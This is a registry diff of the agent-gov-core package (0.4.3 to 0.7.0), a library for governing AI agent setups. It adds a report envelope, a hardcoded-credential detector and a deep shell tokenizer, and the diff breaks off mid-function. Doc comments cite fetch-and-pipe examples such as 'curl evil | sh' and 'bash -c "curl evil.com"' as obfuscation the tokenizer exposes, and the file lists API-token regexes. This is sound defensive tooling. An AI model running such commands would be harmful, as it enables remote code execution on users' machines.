agent-gov-core 0.4.3 → 0.7.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +101 -0
- package/README.md +53 -5
- package/dist/action.d.ts +30 -0
- package/dist/action.js +98 -0
- package/dist/exceptions.d.ts +83 -0
- package/dist/exceptions.js +129 -0
- package/dist/finding.js +7 -4
- package/dist/index.d.ts +12 -2
- package/dist/index.js +7 -2
- package/dist/jsonc.js +2 -1
- package/dist/locators.d.ts +3 -1
- package/dist/locators.js +66 -34
- package/dist/mcp.js +61 -2
- package/dist/merge.d.ts +91 -0
- package/dist/merge.js +154 -0
- package/dist/parse-error.d.ts +54 -0
- package/dist/parse-error.js +85 -0
- package/dist/report.d.ts +85 -0
- package/dist/report.js +156 -0
- package/dist/secrets.d.ts +67 -0
- package/dist/secrets.js +81 -0
- package/dist/shell.d.ts +26 -0
- package/dist/shell.js +210 -1
- package/dist/toml.js +28 -7
- package/package.json +3 -2
- package/schemas/report.schema.json +55 -0
package/dist/report.d.ts
ADDED
|
@@ -0,0 +1,85 @@
|
|
|
1
|
+
import { type Finding, type Severity, type ToolKind } from './finding.js';
|
|
2
|
+
/** Canonical envelope version. */
|
|
3
|
+
export declare const REPORT_SCHEMA_VERSION: "1.0";
|
|
4
|
+
/**
|
|
5
|
+
* Canonical multi-tool report envelope. Wraps `Finding[]` with provenance,
|
|
6
|
+
* rating, and optional tool-specific extension data so a cross-tool
|
|
7
|
+
* meta-reviewer can ingest reports from N tools through one shape.
|
|
8
|
+
*/
|
|
9
|
+
export interface Report {
|
|
10
|
+
schemaVersion: typeof REPORT_SCHEMA_VERSION;
|
|
11
|
+
tool: ToolKind;
|
|
12
|
+
toolVersion?: string;
|
|
13
|
+
runId?: string;
|
|
14
|
+
/**
|
|
15
|
+
* Identifier for the agent session, PR review, or thread this run belongs to.
|
|
16
|
+
* Distinct from `runId` (which identifies *this* tool run): one conversation
|
|
17
|
+
* can produce many runs. Matches OpenTelemetry's `gen_ai.conversation.id`
|
|
18
|
+
* semantic convention — if a consumer also emits OTel traces about the same
|
|
19
|
+
* agent session, pass the same string here and downstream tooling can cross-
|
|
20
|
+
* reference governance findings with the traces.
|
|
21
|
+
*
|
|
22
|
+
* @see https://opentelemetry.io/docs/specs/semconv/gen-ai/
|
|
23
|
+
*/
|
|
24
|
+
conversationId?: string;
|
|
25
|
+
baseRef?: string;
|
|
26
|
+
headRef?: string;
|
|
27
|
+
/** Aggregate severity. `'none'` iff findings is empty or all below threshold. */
|
|
28
|
+
rating: 'none' | Severity;
|
|
29
|
+
findings: Finding[];
|
|
30
|
+
/** Tool-specific extension data (PolicyMesh `effectiveUnion`, CapabilityEcho `surfaceSummary`, etc). */
|
|
31
|
+
data?: Record<string, unknown>;
|
|
32
|
+
}
|
|
33
|
+
export interface CreateReportSpec {
|
|
34
|
+
tool: ToolKind;
|
|
35
|
+
toolVersion?: string;
|
|
36
|
+
runId?: string;
|
|
37
|
+
/** See {@link Report.conversationId}. */
|
|
38
|
+
conversationId?: string;
|
|
39
|
+
baseRef?: string;
|
|
40
|
+
headRef?: string;
|
|
41
|
+
findings: Finding[];
|
|
42
|
+
data?: Record<string, unknown>;
|
|
43
|
+
/**
|
|
44
|
+
* Explicit rating override. When omitted, `rating` is computed as the
|
|
45
|
+
* maximum severity across `findings` (or `'none'` if empty).
|
|
46
|
+
*/
|
|
47
|
+
rating?: 'none' | Severity;
|
|
48
|
+
}
|
|
49
|
+
/**
|
|
50
|
+
* Build a {@link Report} with `schemaVersion` set and `rating` derived from
|
|
51
|
+
* the maximum finding severity (unless overridden). This is the recommended
|
|
52
|
+
* way to produce a report — sets the envelope version correctly and computes
|
|
53
|
+
* the rating consistently with other tools.
|
|
54
|
+
*
|
|
55
|
+
* @example
|
|
56
|
+
* const report = createReport({
|
|
57
|
+
* tool: 'scope_trail',
|
|
58
|
+
* toolVersion: '0.1.18',
|
|
59
|
+
* baseRef: 'abc123',
|
|
60
|
+
* headRef: 'def456',
|
|
61
|
+
* findings: [finding1, finding2],
|
|
62
|
+
* data: { mcpServers: [...] },
|
|
63
|
+
* });
|
|
64
|
+
*/
|
|
65
|
+
export declare function createReport(spec: CreateReportSpec): Report;
|
|
66
|
+
/**
|
|
67
|
+
* Maximum severity across a finding list. Returns `'none'` for empty input.
|
|
68
|
+
* Used by {@link createReport} when no explicit rating is supplied.
|
|
69
|
+
*/
|
|
70
|
+
export declare function maxSeverity(findings: readonly Finding[]): 'none' | Severity;
|
|
71
|
+
export interface ReportValidationResult {
|
|
72
|
+
ok: boolean;
|
|
73
|
+
errors: string[];
|
|
74
|
+
}
|
|
75
|
+
/**
|
|
76
|
+
* Runtime check that a value conforms to the canonical Report envelope.
|
|
77
|
+
* Aggregates errors across all findings — a single malformed finding does
|
|
78
|
+
* not short-circuit the rest of the envelope check.
|
|
79
|
+
*
|
|
80
|
+
* @example
|
|
81
|
+
* const result = validateReport(JSON.parse(reportJson));
|
|
82
|
+
* if (!result.ok) console.error(result.errors.join('\n'));
|
|
83
|
+
*/
|
|
84
|
+
export declare function validateReport(value: unknown): ReportValidationResult;
|
|
85
|
+
//# sourceMappingURL=report.d.ts.map
|
package/dist/report.js
ADDED
|
@@ -0,0 +1,156 @@
|
|
|
1
|
+
import { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, validateFinding, } from './finding.js';
|
|
2
|
+
/** Canonical envelope version. */
|
|
3
|
+
export const REPORT_SCHEMA_VERSION = '1.0';
|
|
4
|
+
/**
 * Assemble a {@link Report} envelope from `spec`.
 *
 * - `schemaVersion` is always stamped with `REPORT_SCHEMA_VERSION`.
 * - `rating` is `spec.rating` unless that is `null`/`undefined`, in which case
 *   it is computed with {@link maxSeverity} over `spec.findings`.
 * - `toolVersion`, `runId`, `conversationId`, `baseRef`, `headRef` and `data`
 *   are copied only when they are not `undefined`, so omitted fields never
 *   show up as keys on the result.
 *
 * `findings` (and `data`, when given) are stored by reference, not cloned.
 *
 * @example
 * const report = createReport({
 *   tool: 'scope_trail',
 *   toolVersion: '0.1.18',
 *   baseRef: 'abc123',
 *   headRef: 'def456',
 *   findings: [finding1, finding2],
 *   data: { mcpServers: [...] },
 * });
 */
export function createReport(spec) {
    const { tool, findings } = spec;
    const rating = spec.rating ?? maxSeverity(findings);
    // Required fields first; this fixes the key order of the serialized envelope.
    const report = { schemaVersion: REPORT_SCHEMA_VERSION, tool, rating, findings };
    // Optional fields, in the order they are appended to the envelope.
    const optionalKeys = ['toolVersion', 'runId', 'conversationId', 'baseRef', 'headRef', 'data'];
    for (const key of optionalKeys) {
        const supplied = spec[key];
        if (supplied !== undefined) {
            report[key] = supplied;
        }
    }
    return report;
}
|
|
41
|
+
/**
|
|
42
|
+
* Maximum severity across a finding list. Returns `'none'` for empty input.
|
|
43
|
+
* Used by {@link createReport} when no explicit rating is supplied.
|
|
44
|
+
*/
|
|
45
|
+
export function maxSeverity(findings) {
|
|
46
|
+
let best = 'none';
|
|
47
|
+
for (const f of findings) {
|
|
48
|
+
if (severityRank(f.severity) > severityRank(best))
|
|
49
|
+
best = f.severity;
|
|
50
|
+
}
|
|
51
|
+
return best;
|
|
52
|
+
}
|
|
53
|
+
function severityRank(s) {
|
|
54
|
+
if (s === 'none')
|
|
55
|
+
return 0;
|
|
56
|
+
if (s === 'low')
|
|
57
|
+
return 1;
|
|
58
|
+
if (s === 'medium')
|
|
59
|
+
return 2;
|
|
60
|
+
if (s === 'high')
|
|
61
|
+
return 3;
|
|
62
|
+
return 4;
|
|
63
|
+
}
|
|
64
|
+
/** Property names permitted at the top level of a report envelope. */
const REPORT_ALLOWED_KEYS = new Set([
    'schemaVersion',
    'tool',
    'toolVersion',
    'runId',
    'conversationId',
    'baseRef',
    'headRef',
    'rating',
    'findings',
    'data',
]);
/** Accepted `rating` values: `'none'` plus every entry of `SEVERITIES`. */
const RATING_VALUES = new Set(['none', ...SEVERITIES]);
/**
 * Runtime check that a value conforms to the canonical Report envelope.
 *
 * Errors are collected rather than thrown: apart from the initial
 * "must be a plain object" guard, every check runs, so one malformed finding
 * does not hide problems elsewhere in the envelope.
 *
 * Checks, in the order their messages are emitted:
 *  1. `schemaVersion`, `tool`, `rating` hold allowed values;
 *  2. `findings` is an array, each entry passes `validateFinding`, and each
 *     valid entry's `tool` equals the report's `tool` (when that is valid);
 *  3. optional string fields and `data` have the right type when present;
 *  4. no unknown top-level properties;
 *  5. `rating` is not below the maximum finding severity (only evaluated when
 *     the rating is valid and every finding validated).
 *
 * @param value Any value, typically the result of `JSON.parse`.
 * @returns `{ ok, errors }`; `ok` is `true` exactly when `errors` is empty.
 *
 * @example
 * const result = validateReport(JSON.parse(reportJson));
 * if (!result.ok) console.error(result.errors.join('\n'));
 */
export function validateReport(value) {
    if (value === null || typeof value !== 'object' || Array.isArray(value)) {
        return { ok: false, errors: ['report must be a plain object'] };
    }
    const errors = [];
    const v = value;
    if (v.schemaVersion !== REPORT_SCHEMA_VERSION) {
        errors.push(`schemaVersion must be '${REPORT_SCHEMA_VERSION}'`);
    }
    const toolOk = isToolKind(v.tool);
    if (!toolOk) {
        errors.push(`tool must be one of: ${TOOL_KINDS.join(', ')}`);
    }
    const ratingOk = typeof v.rating === 'string' && RATING_VALUES.has(v.rating);
    if (!ratingOk) {
        errors.push(`rating must be one of: none, ${SEVERITIES.join(', ')}`);
    }
    const findingsIsArray = Array.isArray(v.findings);
    // Tracks whether every entry validated, so the rating consistency check
    // below does not have to run `validateFinding` over the list a second time.
    let allFindingsValid = findingsIsArray;
    if (!findingsIsArray) {
        errors.push('findings must be an array');
    }
    else {
        // Indexed loop on purpose: it also visits holes in a sparse array.
        for (let i = 0; i < v.findings.length; i++) {
            const finding = v.findings[i];
            const outcome = validateFinding(finding);
            if (!outcome.ok) {
                allFindingsValid = false;
                errors.push(`findings[${i}]: ${outcome.errors.join('; ')}`);
            }
            else if (toolOk && finding.tool !== v.tool) {
                errors.push(`findings[${i}].tool ('${finding.tool}') does not match report.tool ('${v.tool}')`);
            }
        }
    }
    for (const key of ['toolVersion', 'runId', 'conversationId', 'baseRef', 'headRef']) {
        if (v[key] !== undefined && typeof v[key] !== 'string') {
            errors.push(`${key} must be a string when present`);
        }
    }
    if (v.data !== undefined && (v.data === null || typeof v.data !== 'object' || Array.isArray(v.data))) {
        errors.push('data must be an object when present');
    }
    for (const key of Object.keys(v)) {
        if (!REPORT_ALLOWED_KEYS.has(key))
            errors.push(`unknown property: ${key}`);
    }
    // Cross-field consistency: a rating ABOVE what the findings imply is
    // accepted, but a rating BELOW the maximum finding severity is reported
    // as an inconsistency.
    if (findingsIsArray && ratingOk && allFindingsValid) {
        const implied = maxSeverity(v.findings);
        if (severityRank(v.rating) < severityRank(implied)) {
            errors.push(`rating '${v.rating}' is below the maximum finding severity '${implied}'`);
        }
    }
    // No-op: references the imported `isSeverity` binding without calling it.
    // It performs no additional check on `rating`.
    void isSeverity;
    return { ok: errors.length === 0, errors };
}
|
|
156
|
+
//# sourceMappingURL=report.js.map
|
|
@@ -0,0 +1,67 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Hardcoded credential detection.
|
|
3
|
+
*
|
|
4
|
+
* Scans strings for provider-prefix tokens (Anthropic, OpenAI, GitHub, AWS,
|
|
5
|
+
* Slack, Google, GitLab, npm, Docker, Stripe) plus a length-restricted hex
|
|
6
|
+
* pattern that only fires in env/header context (a bare hex blob in a
|
|
7
|
+
* positional command argument is indistinguishable from a commit SHA).
|
|
8
|
+
*
|
|
9
|
+
* Contract: the literal credential is NEVER returned in any field. Callers
|
|
10
|
+
* receive only the name of the provider whose pattern matched (provider
|
|
11
|
+
* label only — not the regex). This is the same contract PolicyMesh shipped
|
|
12
|
+
* the detector under, lifted into the substrate so every governance tool
|
|
13
|
+
* uses one source of truth for "what does a hardcoded credential look like."
|
|
14
|
+
*
|
|
15
|
+
* @example
|
|
16
|
+
* import { matchSecret } from 'agent-gov-core';
|
|
17
|
+
*
|
|
18
|
+
* matchSecret('sk-ant-abcdefghijklmnopqrstuv');
|
|
19
|
+
* // → { provider: 'Anthropic' }
|
|
20
|
+
*
|
|
21
|
+
* matchSecret('env:OPENAI_API_KEY');
|
|
22
|
+
* // → undefined (env var reference, not a literal)
|
|
23
|
+
*
|
|
24
|
+
* matchSecret('a'.repeat(40), { envOrHeaderContext: true });
|
|
25
|
+
* // → { provider: 'Hex token' } ('a' is a hex digit, so 40 of them match the env/header-only hex pattern)
|
|
26
|
+
*/
|
|
27
|
+
export interface SecretMatch {
|
|
28
|
+
/** Human-readable provider name. The literal credential is NEVER included. */
|
|
29
|
+
provider: string;
|
|
30
|
+
}
|
|
31
|
+
export interface MatchSecretOptions {
|
|
32
|
+
/**
|
|
33
|
+
* When `true`, patterns flagged `envOrHeaderOnly` are eligible. Set this
|
|
34
|
+
* only when scanning env values or HTTP header values — never when scanning
|
|
35
|
+
* a joined launch command (positional args often contain commit SHAs that
|
|
36
|
+
* would false-positive against a bare hex token pattern).
|
|
37
|
+
*/
|
|
38
|
+
envOrHeaderContext?: boolean;
|
|
39
|
+
}
|
|
40
|
+
interface SecretPattern {
|
|
41
|
+
provider: string;
|
|
42
|
+
regex: RegExp;
|
|
43
|
+
/** See {@link MatchSecretOptions.envOrHeaderContext}. */
|
|
44
|
+
envOrHeaderOnly?: boolean;
|
|
45
|
+
}
|
|
46
|
+
/**
|
|
47
|
+
* Built-in provider patterns. Conservative — only shapes whose prefix
|
|
48
|
+
* unambiguously identifies a credential class. The bare hex pattern is gated
|
|
49
|
+
* to env/header context to avoid commit-SHA false positives.
|
|
50
|
+
*
|
|
51
|
+
* Stable as of v0.7.0 — additions are non-breaking, removals or shape changes
|
|
52
|
+
* require a major bump (the golden compatibility tests in `test/golden.test.mjs`
|
|
53
|
+
* pin the current provider set).
|
|
54
|
+
*/
|
|
55
|
+
export declare const SECRET_PATTERNS: readonly Readonly<SecretPattern>[];
|
|
56
|
+
/**
|
|
57
|
+
* Scan `value` for a hardcoded provider credential. Returns the matched
|
|
58
|
+
* provider name (never the literal credential) or `undefined` when nothing
|
|
59
|
+
* matches.
|
|
60
|
+
*
|
|
61
|
+
* Set `options.envOrHeaderContext` to `true` only when scanning env values
|
|
62
|
+
* or HTTP header values — that enables the more permissive hex-token pattern
|
|
63
|
+
* which would false-positive on positional command arguments.
|
|
64
|
+
*/
|
|
65
|
+
export declare function matchSecret(value: string, options?: MatchSecretOptions): SecretMatch | undefined;
|
|
66
|
+
export {};
|
|
67
|
+
//# sourceMappingURL=secrets.d.ts.map
|
package/dist/secrets.js
ADDED
|
@@ -0,0 +1,81 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Hardcoded credential detection.
|
|
3
|
+
*
|
|
4
|
+
* Scans strings for provider-prefix tokens (Anthropic, OpenAI, GitHub, AWS,
|
|
5
|
+
* Slack, Google, GitLab, npm, Docker, Stripe) plus a length-restricted hex
|
|
6
|
+
* pattern that only fires in env/header context (a bare hex blob in a
|
|
7
|
+
* positional command argument is indistinguishable from a commit SHA).
|
|
8
|
+
*
|
|
9
|
+
* Contract: the literal credential is NEVER returned in any field. Callers
|
|
10
|
+
* receive only the name of the provider whose pattern matched (provider
|
|
11
|
+
* label only — not the regex). This is the same contract PolicyMesh shipped
|
|
12
|
+
* the detector under, lifted into the substrate so every governance tool
|
|
13
|
+
* uses one source of truth for "what does a hardcoded credential look like."
|
|
14
|
+
*
|
|
15
|
+
* @example
|
|
16
|
+
* import { matchSecret } from 'agent-gov-core';
|
|
17
|
+
*
|
|
18
|
+
* matchSecret('sk-ant-abcdefghijklmnopqrstuv');
|
|
19
|
+
* // → { provider: 'Anthropic' }
|
|
20
|
+
*
|
|
21
|
+
* matchSecret('env:OPENAI_API_KEY');
|
|
22
|
+
* // → undefined (env var reference, not a literal)
|
|
23
|
+
*
|
|
24
|
+
* matchSecret('a'.repeat(40), { envOrHeaderContext: true });
|
|
25
|
+
* // → { provider: 'Hex token' } ('a' is a hex digit, so 40 of them match the env/header-only hex pattern)
|
|
26
|
+
*/
|
|
27
|
+
/**
|
|
28
|
+
* Built-in provider patterns. Conservative — only shapes whose prefix
|
|
29
|
+
* unambiguously identifies a credential class. The bare hex pattern is gated
|
|
30
|
+
* to env/header context to avoid commit-SHA false positives.
|
|
31
|
+
*
|
|
32
|
+
* Stable as of v0.7.0 — additions are non-breaking, removals or shape changes
|
|
33
|
+
* require a major bump (the golden compatibility tests in `test/golden.test.mjs`
|
|
34
|
+
* pin the current provider set).
|
|
35
|
+
*/
|
|
36
|
+
export const SECRET_PATTERNS = [
|
|
37
|
+
{ provider: 'Anthropic', regex: /sk-ant-[A-Za-z0-9_-]{20,}/ },
|
|
38
|
+
{ provider: 'OpenAI', regex: /sk-proj-[A-Za-z0-9_-]{20,}/ },
|
|
39
|
+
{ provider: 'OpenAI', regex: /sk-(?!ant-|proj-)[A-Za-z0-9]{32,}/ },
|
|
40
|
+
{ provider: 'GitHub', regex: /gh[pousr]_[A-Za-z0-9]{36,}/ },
|
|
41
|
+
{ provider: 'GitHub', regex: /github_pat_[A-Za-z0-9_]{20,}/ },
|
|
42
|
+
{ provider: 'Slack', regex: /xox[abprs]-[A-Za-z0-9-]{20,}/ },
|
|
43
|
+
{ provider: 'AWS', regex: /AKIA[0-9A-Z]{16}/ },
|
|
44
|
+
{ provider: 'Google', regex: /AIza[0-9A-Za-z_-]{35}/ },
|
|
45
|
+
{ provider: 'GitLab', regex: /glpat-[A-Za-z0-9_-]{20,}/ },
|
|
46
|
+
{ provider: 'npm', regex: /npm_[A-Za-z0-9]{36}/ },
|
|
47
|
+
{ provider: 'Docker', regex: /dckr_pat_[A-Za-z0-9_-]{20,}/ },
|
|
48
|
+
{ provider: 'Stripe', regex: /(?:sk|rk)_(?:live|test)_[A-Za-z0-9]{20,}/ },
|
|
49
|
+
// env/header context only — see comment block at top of file.
|
|
50
|
+
{ provider: 'Hex token', regex: /(?:^|[^A-Fa-f0-9])([A-Fa-f0-9]{40,})(?:$|[^A-Fa-f0-9])/, envOrHeaderOnly: true },
|
|
51
|
+
];
|
|
52
|
+
/**
|
|
53
|
+
* Prefix marking an environment-variable reference. Values starting with
|
|
54
|
+
* `env:` are not literal credentials — they're a reference resolved at
|
|
55
|
+
* runtime by the consuming tool (Codex notation). Skipped during scanning.
|
|
56
|
+
*/
|
|
57
|
+
const ENV_REFERENCE_PREFIX = 'env:';
|
|
58
|
+
/**
|
|
59
|
+
* Scan `value` for a hardcoded provider credential. Returns the matched
|
|
60
|
+
* provider name (never the literal credential) or `undefined` when nothing
|
|
61
|
+
* matches.
|
|
62
|
+
*
|
|
63
|
+
* Set `options.envOrHeaderContext` to `true` only when scanning env values
|
|
64
|
+
* or HTTP header values — that enables the more permissive hex-token pattern
|
|
65
|
+
* which would false-positive on positional command arguments.
|
|
66
|
+
*/
|
|
67
|
+
export function matchSecret(value, options = {}) {
|
|
68
|
+
if (!value)
|
|
69
|
+
return undefined;
|
|
70
|
+
if (value.startsWith(ENV_REFERENCE_PREFIX))
|
|
71
|
+
return undefined;
|
|
72
|
+
for (const pattern of SECRET_PATTERNS) {
|
|
73
|
+
if (pattern.envOrHeaderOnly && !options.envOrHeaderContext)
|
|
74
|
+
continue;
|
|
75
|
+
if (pattern.regex.test(value)) {
|
|
76
|
+
return { provider: pattern.provider };
|
|
77
|
+
}
|
|
78
|
+
}
|
|
79
|
+
return undefined;
|
|
80
|
+
}
|
|
81
|
+
//# sourceMappingURL=secrets.js.map
|
package/dist/shell.d.ts
CHANGED
|
@@ -12,6 +12,32 @@
|
|
|
12
12
|
* // → ['echo "; not a separator"']
|
|
13
13
|
*/
|
|
14
14
|
export declare function tokenizeShell(command: string): string[];
|
|
15
|
+
/**
|
|
16
|
+
* Like {@link tokenizeShell}, but recursively extracts commands nested inside
|
|
17
|
+
* shell evaluation contexts that the top-level tokenizer would leave as opaque
|
|
18
|
+
* text:
|
|
19
|
+
*
|
|
20
|
+
* - Subshell `$(...)`
|
|
21
|
+
* - Backtick `` `...` ``
|
|
22
|
+
* - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
|
|
23
|
+
*
|
|
24
|
+
* The flat result is suitable for feeding straight to {@link getCommandHead},
|
|
25
|
+
* letting downstream detectors see commands an agent might try to hide behind
|
|
26
|
+
* `echo $(curl evil | sh)` or `bash -c "curl evil"`.
|
|
27
|
+
*
|
|
28
|
+
* Conservative implementation — handles the common obfuscation shapes, not a
|
|
29
|
+
* full shell parser. Variable expansion, process substitution `<(…)`, and
|
|
30
|
+
* arithmetic `$((…))` are not recursed into. ANSI-C quoting (`bash -c $'…'`) is
|
|
31
|
+
* not unquoted.
|
|
32
|
+
*
|
|
33
|
+
* @example
|
|
34
|
+
* tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
|
|
35
|
+
* // → ['echo', 'curl -fsSL m.sh', 'sh']
|
|
36
|
+
*
|
|
37
|
+
* tokenizeShellDeep('bash -c "curl evil.com"');
|
|
38
|
+
* // → ['bash -c "curl evil.com"', 'curl evil.com']
|
|
39
|
+
*/
|
|
40
|
+
export declare function tokenizeShellDeep(command: string): string[];
|
|
15
41
|
/**
|
|
16
42
|
* Returns the resolved command verb for a subcommand string. Strips wrapping
|
|
17
43
|
* quotes, escape backslashes, and the inert-double-quote obfuscation
|
package/dist/shell.js
CHANGED
|
@@ -83,8 +83,17 @@ export function tokenizeShell(command) {
|
|
|
83
83
|
i += 2;
|
|
84
84
|
continue;
|
|
85
85
|
}
|
|
86
|
-
// Treat a single `&` (background) as a separator too
|
|
86
|
+
// Treat a single `&` (background) as a separator too — UNLESS preceded
|
|
87
|
+
// by `>` or `<`, in which case it's a file-descriptor redirection like
|
|
88
|
+
// `2>&1`, `>&2`, or `<&3`. Splitting there would break shell-command
|
|
89
|
+
// detection on every command that redirects stderr to stdout.
|
|
87
90
|
if (c === '&') {
|
|
91
|
+
const prev = buf.trimEnd().slice(-1);
|
|
92
|
+
if (prev === '>' || prev === '<') {
|
|
93
|
+
buf += c;
|
|
94
|
+
i++;
|
|
95
|
+
continue;
|
|
96
|
+
}
|
|
88
97
|
pushPart(out, buf);
|
|
89
98
|
buf = '';
|
|
90
99
|
i++;
|
|
@@ -101,6 +110,206 @@ function pushPart(out, part) {
|
|
|
101
110
|
if (trimmed !== '')
|
|
102
111
|
out.push(trimmed);
|
|
103
112
|
}
|
|
113
|
+
/**
 * Deep variant of {@link tokenizeShell}: besides the top-level subcommands it
 * also returns the subcommands of every payload that
 * `extractNestedShellPayloads` finds inside the command:
 *
 * - Subshell `$(...)`
 * - Backtick `` `...` ``
 * - `<interpreter> -c "..."` payloads (`bash`, `sh`, `zsh`, `python`, …)
 *
 * The result is a flat list meant to be fed to {@link getCommandHead}, so
 * downstream detectors can see commands hidden behind
 * `echo $(curl evil | sh)` or `bash -c "curl evil"`.
 *
 * Ordering and limits:
 * - A command's own subcommands come first, then each nested payload is
 *   expanded depth-first in the order it was found.
 * - Exact duplicate strings are emitted once.
 * - Payloads nested more than 8 levels deep are ignored (guard against
 *   pathological nesting).
 *
 * Not a full shell parser. In particular, ANSI-C quoting
 * (`bash -c $'…'`) is not unquoted.
 *
 * @example
 * tokenizeShellDeep('bash -c "curl evil.com"');
 * // → ['bash -c "curl evil.com"', 'curl evil.com']
 * // (assuming `tokenizeShell` leaves the quoted text in one piece)
 */
export function tokenizeShellDeep(command) {
    const MAX_DEPTH = 8;
    const ordered = [];
    const emitted = new Set();
    // Explicit work stack instead of recursion; popping from the end and
    // pushing children in reverse keeps the same pre-order traversal.
    const pending = [{ text: command, depth: 0 }];
    while (pending.length > 0) {
        const { text, depth } = pending.pop();
        if (depth > MAX_DEPTH) {
            continue;
        }
        // Payloads are taken from the WHOLE text before it is split:
        // `tokenizeShell` cuts on `|` regardless of paren depth, which would
        // slice `$(curl m.sh | sh)` in two before `$(…)` could be matched.
        const payloads = extractNestedShellPayloads(text);
        for (const piece of tokenizeShell(text)) {
            if (emitted.has(piece)) {
                continue;
            }
            emitted.add(piece);
            ordered.push(piece);
        }
        for (let k = payloads.length - 1; k >= 0; k--) {
            pending.push({ text: payloads[k], depth: depth + 1 });
        }
    }
    return ordered;
}
|
|
161
|
+
/**
|
|
162
|
+
* Return all shell-evaluation payloads embedded in a single subcommand:
|
|
163
|
+
* - `$(…)` and `` `…` `` bodies (paren/backtick balanced)
|
|
164
|
+
* - `(bash|sh|zsh|python|python3|perl|ruby|node) -c <quoted-string>` payloads
|
|
165
|
+
* The payloads are returned UNQUOTED but otherwise raw.
|
|
166
|
+
*/
|
|
167
|
+
function extractNestedShellPayloads(subcommand) {
|
|
168
|
+
const found = [];
|
|
169
|
+
const len = subcommand.length;
|
|
170
|
+
let i = 0;
|
|
171
|
+
let inSingle = false;
|
|
172
|
+
let inDouble = false;
|
|
173
|
+
// Pre-compiled here so we can use it inside the quote-aware walk.
|
|
174
|
+
const dashCMatcher = /^(?:bash|sh|zsh|ksh|dash|ash|fish|python3?|perl|ruby|node)\s+-c\s+/;
|
|
175
|
+
while (i < len) {
|
|
176
|
+
const c = subcommand[i];
|
|
177
|
+
// Plain single quotes: nothing inside is shell-interpreted
|
|
178
|
+
if (inSingle) {
|
|
179
|
+
if (c === "'")
|
|
180
|
+
inSingle = false;
|
|
181
|
+
i++;
|
|
182
|
+
continue;
|
|
183
|
+
}
|
|
184
|
+
if (c === "'") {
|
|
185
|
+
inSingle = true;
|
|
186
|
+
i++;
|
|
187
|
+
continue;
|
|
188
|
+
}
|
|
189
|
+
// Inside double quotes, `$(…)` and backticks STILL evaluate, so we
|
|
190
|
+
// keep scanning. Just remember to re-enable detection of an outer
|
|
191
|
+
// closing `"`.
|
|
192
|
+
if (c === '"') {
|
|
193
|
+
inDouble = !inDouble;
|
|
194
|
+
i++;
|
|
195
|
+
continue;
|
|
196
|
+
}
|
|
197
|
+
// $(...)
|
|
198
|
+
if (c === '$' && subcommand[i + 1] === '(') {
|
|
199
|
+
const body = readBalanced(subcommand, i + 2, '(', ')');
|
|
200
|
+
if (body !== null) {
|
|
201
|
+
found.push(body.content);
|
|
202
|
+
i = body.endIndex;
|
|
203
|
+
continue;
|
|
204
|
+
}
|
|
205
|
+
}
|
|
206
|
+
// Backticks
|
|
207
|
+
if (c === '`') {
|
|
208
|
+
const close = subcommand.indexOf('`', i + 1);
|
|
209
|
+
if (close !== -1) {
|
|
210
|
+
found.push(subcommand.slice(i + 1, close));
|
|
211
|
+
i = close + 1;
|
|
212
|
+
continue;
|
|
213
|
+
}
|
|
214
|
+
}
|
|
215
|
+
// `bash -c "..."` and friends — checked only OUTSIDE quoted regions so
|
|
216
|
+
// `echo "bash -c \"curl evil\""` (data, not a command) doesn't trigger.
|
|
217
|
+
// Match boundary: only at start-of-string OR after whitespace / a chain
|
|
218
|
+
// separator.
|
|
219
|
+
if (!inDouble) {
|
|
220
|
+
const atBoundary = i === 0 || /[\s;|&]/.test(subcommand[i - 1]);
|
|
221
|
+
if (atBoundary) {
|
|
222
|
+
const tail = subcommand.slice(i);
|
|
223
|
+
const dashCMatch = dashCMatcher.exec(tail);
|
|
224
|
+
if (dashCMatch) {
|
|
225
|
+
const afterFlag = i + dashCMatch[0].length;
|
|
226
|
+
const payload = readQuotedArg(subcommand, afterFlag);
|
|
227
|
+
if (payload !== null)
|
|
228
|
+
found.push(payload);
|
|
229
|
+
// Skip past the matched `bash -c ` prefix so the walk continues
|
|
230
|
+
// from the argument position; we don't try to compute where the
|
|
231
|
+
// quoted arg ends (the next iteration will hit the quote and toggle
|
|
232
|
+
// inDouble naturally).
|
|
233
|
+
i = afterFlag;
|
|
234
|
+
continue;
|
|
235
|
+
}
|
|
236
|
+
}
|
|
237
|
+
}
|
|
238
|
+
i++;
|
|
239
|
+
}
|
|
240
|
+
return found;
|
|
241
|
+
}
|
|
242
|
+
/** Read a balanced `open`/`close` body starting at `start` (already past the open). */
|
|
243
|
+
function readBalanced(input, start, open, close) {
|
|
244
|
+
let depth = 1;
|
|
245
|
+
let i = start;
|
|
246
|
+
let inSingle = false;
|
|
247
|
+
let inDouble = false;
|
|
248
|
+
while (i < input.length) {
|
|
249
|
+
const c = input[i];
|
|
250
|
+
if (inSingle) {
|
|
251
|
+
if (c === "'")
|
|
252
|
+
inSingle = false;
|
|
253
|
+
i++;
|
|
254
|
+
continue;
|
|
255
|
+
}
|
|
256
|
+
if (c === "'") {
|
|
257
|
+
inSingle = true;
|
|
258
|
+
i++;
|
|
259
|
+
continue;
|
|
260
|
+
}
|
|
261
|
+
if (c === '"') {
|
|
262
|
+
inDouble = !inDouble;
|
|
263
|
+
i++;
|
|
264
|
+
continue;
|
|
265
|
+
}
|
|
266
|
+
if (!inDouble) {
|
|
267
|
+
if (c === open)
|
|
268
|
+
depth++;
|
|
269
|
+
else if (c === close) {
|
|
270
|
+
depth--;
|
|
271
|
+
if (depth === 0)
|
|
272
|
+
return { content: input.slice(start, i), endIndex: i + 1 };
|
|
273
|
+
}
|
|
274
|
+
}
|
|
275
|
+
i++;
|
|
276
|
+
}
|
|
277
|
+
return null;
|
|
278
|
+
}
|
|
279
|
+
/**
|
|
280
|
+
* Read the next quoted (single, double) or bare token starting at `start`,
|
|
281
|
+
* returning its unquoted contents.
|
|
282
|
+
*/
|
|
283
|
+
function readQuotedArg(input, start) {
|
|
284
|
+
let i = start;
|
|
285
|
+
while (i < input.length && (input[i] === ' ' || input[i] === '\t'))
|
|
286
|
+
i++;
|
|
287
|
+
if (i >= input.length)
|
|
288
|
+
return null;
|
|
289
|
+
const q = input[i];
|
|
290
|
+
if (q === '"' || q === "'") {
|
|
291
